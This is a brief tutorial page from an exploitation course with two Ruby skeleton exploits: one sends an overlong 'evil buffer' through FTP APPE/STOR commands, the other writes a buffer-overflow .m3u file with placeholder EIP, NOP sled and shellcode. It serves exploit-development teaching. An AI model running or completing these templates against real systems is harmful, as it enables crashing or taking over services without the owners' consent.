Module 0x5 | Exploitation Kung Fu

Skeleton exploit

It’s really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.

Network base

  1. #!/usr/bin/env ruby
  2. # KING SABRI | @KINGSABRI
  3. require 'socket'
  5. buffer = "A" * 2000
  7. #--> Networking
  8. host = ARGV[0]
  9. port = ARGV[1] || 21
  11. s = TCPSocket.open(host, port)
  12. s.recv(1024)
  13. puts "[+] Sending Username."
  14. s.send("USER ftp\r\n", 0)
  15. s.recv(1024)
  16. puts "[+] Sending Password."
  17. s.send("PASS ftp\r\n", 0)
  18. s.recv(1024)
  19. puts "[+] Sending Evil buffer..."
  20. s.send("APPE " + buffer + "\r\n", 0)
  21. total = s.send("STOR " + buffer + "\r\n", 0)
  22. #--> Exploit Info
  23. puts "[+] " + "Total exploit size: " + "#{total} bytes."
  24. puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
  25. puts "[+] Done"
  27. s.close

To execute it

  1. ruby ftp_exploit.rb [TARGET] [PORT]

Notice that some services has to receive from it and some does not.

File base

Creating a simple exploit file 

  1. #!/usr/bin/env ruby
  2. # KING SABRI | @KINGSABRI
  4. file = ARGV[0] || "exploit.m3u"
  6. junk  = "A" * 2000
  7. eip   = "B" * 4
  8. nops  = "\x90" * 8
  9. shell = "S" * 368
  10. exploit = junk + eip + nops + shell
  12. File.open(file, 'w') {|f| f.write(exploit)}
  13. puts "[*] Exploit size: #{exploit.size}"

To execute it

  1. ruby m3u_exploit.rb song1.m3u